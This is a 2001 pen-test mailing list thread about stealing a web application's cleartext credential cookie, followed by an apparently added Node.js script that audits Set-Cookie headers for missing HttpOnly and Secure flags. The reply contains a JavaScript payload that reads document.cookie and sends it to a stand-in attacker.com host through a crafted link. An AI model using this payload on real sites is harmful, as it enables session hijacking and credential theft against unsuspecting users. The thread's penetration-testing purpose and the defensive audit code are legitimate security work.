Re: Wanted: Script to email cookies

From: Jeremiah Grossman (jeremiah@whitehatsec.com)
Date: 12/01/01


Message-ID: <00e801c17a4b$0d30c380$5a16a8c0@nonehzukwf658a>
From: "Jeremiah Grossman" <jeremiah@whitehatsec.com>
To: "Joe Brown" <joe_brown@senet-int.com>, <pen-test@securityfocus.com>
Subject: Re: Wanted: Script to email cookies
Date: Sat, 1 Dec 2001 18:32:09 +0900

Well, of course there is the ever famous sniffer....
that will see a cookie quite easily.... to move cookies
off domains without the aid of a sniffer.... JavaScript has
been known to be the most widely used method.

something like

<SCRIPT>
var cookie_data = document.cookie;
// concatenate the cookie string onto the query string (the original line was
// wrapped by the mailer and passed the literal text "cookie_data" instead)
window.open('http://www.attacker.com/email_the_cookie.pl?cookie_value=' + cookie_data);
</SCRIPT>

Modify to suit your needs...

The point is that you're using JavaScript to generate an off-domain request
method, passing out the cookie data to a cgi.

good. good.

Jeremiah Grossman

----- Original Message -----
From: "Joe Brown" <joe_brown@senet-int.com>
To: <pen-test@securityfocus.com>
Sent: Friday, November 30, 2001 6:06 PM
Subject: Wanted: Script to email cookies

> I'm working on a pen test for a web application. After
> the first time you successfully authenticate, the app
> stores a cookie with username and password in clear
> text. I've recently read the archive regarding
> vulnerable IE browsers revealing cookies. I'd like to
> go a step farther. Does anyone have a script that will
> email the cookie? I'd like to craft an email with a link
> and when a user clicks, it emails the cookie. I want
> to show the client how dangerous it is to store a clear
> text cookie. Also, any other method of cookie stealing
> would be really appreciated. Thanks.
>
> Joe
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
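As an added example (not part of the thread above, and not Jeremiah's or Joe's code), the Node.js script below models the two facts the exchange relies on: a browser's document.cookie exposes every cookie that is not marked HttpOnly, and a cookie that carries a cleartext password is fully compromised the moment anything reads it. It turns those facts into a Set-Cookie audit a tester or defender can run over captured response headers. The function names (parseSetCookie, scriptVisibleCookies, auditSetCookie), the regex, and the two sample cookies are all assumptions or constructed sample data; the HttpOnly attribute itself postdates this 2001 thread (Microsoft introduced it in IE 6 SP1 in 2002).

```javascript
// Added example, not code from the original thread. Models which cookies page
// script can read via document.cookie and audits Set-Cookie headers for the
// weaknesses discussed in the thread. All cookie names/values are constructed.

// Parse one Set-Cookie header into its name, value and lower-cased attributes.
function parseSetCookie(header) {
  const parts = header.split(';').map(p => p.trim()).filter(Boolean);
  const [rawName, ...rawValue] = parts[0].split('=');
  const attrs = {};
  for (const attr of parts.slice(1)) {
    const [k, ...v] = attr.split('=');
    attrs[k.trim().toLowerCase()] = v.length ? v.join('=') : true;
  }
  return { name: rawName.trim(), value: rawValue.join('='), attrs };
}

// Reproduce what page script sees in document.cookie for a set of cookies:
// "name=value" pairs joined by "; ", omitting any cookie marked HttpOnly.
// (HttpOnly was introduced in IE 6 SP1 in 2002, shortly after this thread.)
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter(c => !c.attrs.httponly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// Matches a "password=" style field inside a cookie value,
// e.g. "user=joe&password=x" (assumed heuristic, tune to the application).
const CREDENTIAL_FIELD = /(^|[&;:,\s])(pass(word|wd)?|pwd)=/i;

// Audit one Set-Cookie header. Returns a list of findings; an empty list
// means none of the checked weaknesses is present.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push('missing HttpOnly'); // readable via document.cookie
  if (!c.attrs.secure)   findings.push('missing Secure');   // sent over plain HTTP, sniffable
  let decoded = c.value;
  try { decoded = decodeURIComponent(c.value); } catch (e) { /* not URL-encoded; keep raw */ }
  if (CREDENTIAL_FIELD.test(decoded) || /pass/i.test(c.name)) {
    findings.push('cleartext credential in cookie');
  }
  return findings;
}

// Constructed sample headers: the kind of cookie described in the original
// question, and a hardened session cookie carrying only an opaque token.
const WEAK_COOKIE = 'auth=user%3Djoe%26password%3Dhunter2; Path=/';
const HARDENED_COOKIE = 'session=c0ns7ruct3dS3ss10nT0k3n; Path=/; Secure; HttpOnly';

console.log('document.cookie would expose:',
  JSON.stringify(scriptVisibleCookies([WEAK_COOKIE, HARDENED_COOKIE])));
console.log('weak cookie findings:', auditSetCookie(WEAK_COOKIE));
console.log('hardened cookie findings:', auditSetCookie(HARDENED_COOKIE));
```

Run with node; the weak cookie is reported as visible to script, unprotected in transit, and carrying a cleartext credential, while the hardened one yields no findings. The audit is deliberately header-based so it can be pointed at a proxy capture rather than needing a browser.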